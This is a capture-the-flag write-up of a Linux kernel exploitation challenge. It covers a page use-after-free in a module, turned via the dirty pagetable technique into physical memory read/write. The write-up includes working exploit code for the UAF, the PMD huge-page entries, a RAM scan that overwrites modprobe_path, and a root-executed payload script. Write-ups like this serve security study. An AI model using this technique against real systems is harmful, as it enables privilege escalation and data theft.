Phantom - Kernel PWN
Points: 750 | Flag: 0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip} | Solved by: Smothy @ 0xN1umb

what we got
kernel pwn challenge, 750 points. the big one.
files:
- bzImage - linux 6.6.15 kernel
- initramfs.cpio.gz - initramfs with the module
- phantom.ko - vulnerable kernel module
- interface.h - ioctl definitions
- run.sh - QEMU launch script
protections: KASLR + SMEP + SMAP, single CPU, 256MB RAM
remote: nc chall.0xfun.org <port> (drops you into a busybox shell inside the VM)
the module
phantom.ko registers a misc device at /dev/phantom with these operations:
- CMD_ALLOC (0x133701): calls alloc_pages(GFP_KERNEL, 0) for a single 4KB page, fills it with 0x41, stores the pointer in a global struct
- CMD_FREE (0x133702): calls __free_pages(), sets a freed flag, but does NOT clear the page pointer or destroy the struct
- mmap: uses remap_pfn_range() to map the physical page into userspace. checks freed == 0 and size <= PAGE_SIZE
- release: properly frees everything on fd close
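the ioctl interface is tiny; a plausible reconstruction of interface.h (the macro names are a guess, only the two command numbers are confirmed by the challenge):

```c
/* hypothetical interface.h - the command values come from the
 * challenge, the names CMD_ALLOC/CMD_FREE are assumed */
#define CMD_ALLOC 0x133701  /* alloc one 4KB page, memset to 0x41 */
#define CMD_FREE  0x133702  /* __free_pages(), sets freed flag only */
```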
the vuln
classic dirty pagetable setup. remap_pfn_range() creates a VM_IO | VM_PFNMAP mapping - this type of mapping does not hold a reference count on the underlying page. so:
1. ioctl(CMD_ALLOC) -> kernel allocates physical page P
2. mmap(fd) -> userspace gets mapping to page P (no refcount!)
3. ioctl(CMD_FREE) -> page P goes back to PCP free list
now we have a dangling userspace pointer to a freed physical page. when the kernel reuses that page for page table structures, we get read/write access to page table entries from userspace. that's the dirty pagetable technique.
the rabbit holes (ngl this took a while)
rabbit hole 1: wrong page table level
first like 6 versions of the exploit assumed the freed page got reused as a PTE page (the leaf level that points to data pages). spent hours trying to write PTE entries - all reads through our modified entries returned 0.
the key diagnostic that finally clicked:
spray[3] before: 0x42 <- touching spray page works fine
PTE[3] kernel: 0x0 <- but UAF page shows NO kernel entry at index 3
PTE[3] after modify: 0x447c067 <- we wrote something
spray[3] after: 0x42 <- ...but it changed nothing
if our UAF page were the PTE page, uaf[3] should show the PTE entry the kernel installed when we touched spray[3]. it didn't. the freed page was actually being reused as the PMD page - one level up in the page table hierarchy.
for addresses in previously-unused PUD ranges, the kernel allocates the PMD page FIRST from the PCP list, then the PTE page. our freed page was the first one grabbed.
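which page table level you land on is pure address arithmetic. the shifts below are standard x86-64 4-level paging (architectural, not challenge-specific) - plugging in the spray base 0x200000000 used in the exploit gives pud_index = 8 and pmd_index = 0, which is why PUD[8] and PMD[0] matter later:

```c
#include <stdint.h>

/* x86-64 4-level paging: 9 bits of the virtual address per level,
 * 512 entries per table */
static inline unsigned pgd_index(uint64_t va) { return (va >> 39) & 0x1ff; }
static inline unsigned pud_index(uint64_t va) { return (va >> 30) & 0x1ff; } /* 1GB granule */
static inline unsigned pmd_index(uint64_t va) { return (va >> 21) & 0x1ff; } /* 2MB granule */
static inline unsigned pte_index(uint64_t va) { return (va >> 12) & 0x1ff; } /* 4KB leaf   */
```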
ran both KVM and TCG (software emulation) in parallel to rule out cache coherency. identical results on both. this is purely a page table level issue.
rabbit hole 2: the munmap trap (this one hurt fr)
ok so figured out it's a PMD page. wrote an exploit using PMD huge page entries - 2MB pages via the _PAGE_PSE bit. reads "worked" (no SIGSEGV) but always returned 0x0. even tried reading BIOS ROM at physical 0xF0000. zero. everything zero.
the problem: i was doing munmap on the spray VMA before remapping. when you munmap, the kernel clears PMD[0]. and since PMD[1..511] are all zero too, the kernel decides the entire PMD page is empty and frees it, then clears the PUD entry. the next mmap creates a BRAND NEW PMD page. our UAF mapping still points to the OLD (now double-freed) page.
the "no fault" behavior wasn't our huge pages working - it was the kernel's page fault handler silently allocating zero-filled pages for the new anonymous VMA. we were reading freshly allocated zeros lmao
the solve
step 1: PMD page UAF (without munmap!)
the fix is dead simple - never munmap. map one huge VMA from the start and just touch one page to anchor it:
// 1. UAF setup
ioctl(fd, CMD_ALLOC, 0);
uaf = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
ioctl(fd, CMD_FREE, 0);
// 2. Map LARGE VMA covering 129 * 2MB = 258MB
// MAP_NORESERVE is critical - VM only has 256MB RAM
spray = mmap((void *)0x200000000ULL, 129UL * PMD_SIZE, /* PMD_SIZE = 2MB */
             PROT_READ|PROT_WRITE,
             MAP_ANON|MAP_PRIVATE|MAP_FIXED|MAP_NORESERVE, -1, 0);
// 3. Touch ONE page to force PMD allocation
// This anchors PMD[0] with a kernel PTE pointer
// PMD[0] being non-zero keeps PUD[8] alive!
*(volatile char *)spray = 'A';

now uaf[0] shows the kernel's PTE pointer - confirms our UAF page IS the PMD page.
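sanity-checking that value is just bit masking. 0x4586067 (the PMD[0] seen on the remote run) decodes to frame 0x4586000 with flags 0x067 = PRESENT|RW|USER|ACCESSED|DIRTY and _PAGE_PSE clear - i.e. a pointer to a PTE table, not a huge-page leaf, which is exactly what a kernel-installed PMD entry should look like:

```c
#include <stdint.h>

/* split a page-table entry into physical frame and flag bits.
 * works for any level: low 12 bits are flags, the rest is the frame */
static inline uint64_t entry_phys(uint64_t e)  { return e & ~0xfffULL; }
static inline uint64_t entry_flags(uint64_t e) { return e &  0xfffULL; }
```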
step 2: install 2MB huge page entries
#define HUGE_FLAGS (_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | \
_PAGE_PSE | _PAGE_ACCESSED | _PAGE_DIRTY)
// = 0xe7
// PMD[i] maps physical address (i-1)*2MB as a 2MB huge page
for (int i = 1; i <= 128; i++)
    uaf[i] = (uint64_t)(i - 1) * PMD_SIZE | HUGE_FLAGS;

boom. 128 huge page entries = 256MB of physical memory mapped into userspace with full read/write. _PAGE_PSE (bit 7) tells the CPU this PMD entry IS the final translation - no PTE page needed. the CPU walks PGD -> PUD -> PMD and the PMD entry directly contains the physical address with 2MB granularity.
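the entry values themselves are pure arithmetic and can be verified offline (the flag bit values below are the standard x86-64 ones):

```c
#include <stdint.h>

#define _PAGE_PRESENT  0x001ULL
#define _PAGE_RW       0x002ULL
#define _PAGE_USER     0x004ULL
#define _PAGE_ACCESSED 0x020ULL
#define _PAGE_DIRTY    0x040ULL
#define _PAGE_PSE      0x080ULL   /* bit 7: PMD entry is a 2MB leaf */
#define PMD_SIZE       (2ULL * 1024 * 1024)

#define HUGE_FLAGS (_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | \
                    _PAGE_PSE | _PAGE_ACCESSED | _PAGE_DIRTY)

/* PMD[i] maps physical (i-1)*2MB; the phys address is 2MB-aligned,
 * so OR-ing in the low flag bits never clobbers it */
static inline uint64_t huge_entry(int i) {
    return (uint64_t)(i - 1) * PMD_SIZE | HUGE_FLAGS;
}
```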
step 3: scan physical memory
with 256MB of phys mem readable, we do two things:
- scan for /sbin/modprobe - overwrite with /tmp/x (our payload script)
- scan for the flag pattern 0xfun{ - read the flag directly from physical RAM
for (int i = 1; i <= 128; i++) {
    char *p = (char *)(BASE_ADDR + (size_t)i * PMD_SIZE);
    char *end = p + PMD_SIZE;
    // scan the entire 2MB block byte by byte
    while (p < end - 14) {
        if (memcmp(p, "/sbin/modprobe", 14) == 0) {
            memcpy(p, "/tmp/x\0", 7); // overwrite modprobe_path
            found_mod++;
        }
        if (p[0]=='0' && p[1]=='x' && p[2]=='f' && p[3]=='u' &&
            p[4]=='n' && p[5]=='{') {
            // read flag directly from physical memory!
        }
        p++;
    }
}

the modprobe_path trick: when the kernel encounters an unknown binary format (our /tmp/trigger file with \xff\xff\xff\xff), it executes modprobe_path as root. we overwrite it to point at /tmp/x which cats the flag.
but the real clutch play was the physical memory scan - on remote the modprobe trick didn't create /tmp/flag (different flag path), but we could read the flag straight from RAM.
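for completeness, the staging side of the modprobe trick can be sketched like this - /tmp/x and the \xff\xff\xff\xff trigger bytes are from the writeup; the /flag source path inside the script is a guess (which is exactly the kind of assumption that failed on remote):

```c
#include <stdio.h>
#include <sys/stat.h>

/* write the payload script and the bogus-binfmt trigger file.
 * exec-ing /tmp/trigger afterwards makes the kernel run
 * modprobe_path (overwritten to /tmp/x) as root. */
static int stage_payload(void) {
    FILE *f = fopen("/tmp/x", "w");
    if (!f) return -1;
    /* NOTE: /flag is an assumed location - scan phys mem as backup */
    fputs("#!/bin/sh\ncat /flag > /tmp/flag\nchmod 666 /tmp/flag\n", f);
    fclose(f);
    chmod("/tmp/x", 0755);

    f = fopen("/tmp/trigger", "w");
    if (!f) return -1;
    fwrite("\xff\xff\xff\xff", 1, 4, f); /* matches no binfmt handler */
    fclose(f);
    chmod("/tmp/trigger", 0755);
    return 0;
}
```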
step 4: remote exploitation
remote gives you a busybox shell inside the QEMU VM. had to upload the static binary (~795KB) through base64:
# compress + b64 encode the static binary
compressed = gzip.compress(data, compresslevel=9)
b64 = base64.b64encode(compressed).decode()
# blast all echo chunks without waiting for responses
# (waiting per-chunk was too slow, connection would die)
r.sendline(f"echo -n '{chunks[0]}'>/tmp/b")
for chunk in chunks[1:]:
r.sendline(f"echo -n '{chunk}'>>/tmp/b")
# wait for shell to process all echoes, then decode
time.sleep(15)
r.sendline(b'base64 -d /tmp/b | gunzip > /tmp/exploit && chmod +x /tmp/exploit')
r.sendline(b'/tmp/exploit')

remote output:
[+] PMD captured! PMD[0] = 0x4586067
[*] Scanning 256MB...
[+] modprobe at phys 0x288b238
[+] FLAG FROM PHYS MEM: 0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip}
[*] Overwrote 1 modprobe occurrences
[*] Triggering modprobe...
[-] /tmp/flag not created
[*] Done
modprobe path didn't work on remote (flag was stored somewhere else), but the physical memory scan pulled it straight from RAM. that's why you always have a backup plan.

key takeaways
- know your page table level: PTE vs PMD vs PUD page reuse depends on allocation order from the PCP free list. for addresses in previously-unused PUD ranges, the PMD page is allocated first. run diagnostics before assuming.
- NEVER munmap your anchor: if every PMD entry in a page becomes zero, the kernel frees the PMD page AND clears the PUD entry above it. always keep at least one kernel-installed PMD entry alive (touch one page to create it).
- huge pages bypass everything: 2MB huge pages via _PAGE_PSE in PMD entries give direct physical memory access. no PTE page needed, no kernel page fault handler involvement for present pages. just raw physical memory access.
- TCG = KVM for page table bugs: software emulation and hardware virtualization behave identically for page table manipulation. useful for ruling out cache coherency issues when debugging.
- always scan phys mem for the flag: modprobe_path is the classic privesc but the flag path might differ on remote. scanning physical memory for the flag format directly is the ultimate backup - if it's in RAM, you'll find it.
- MAP_NORESERVE for big mmaps: in VMs with limited RAM, large anonymous mappings fail without this flag. it tells the kernel not to reserve swap space upfront.
flag
0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip}
smothy out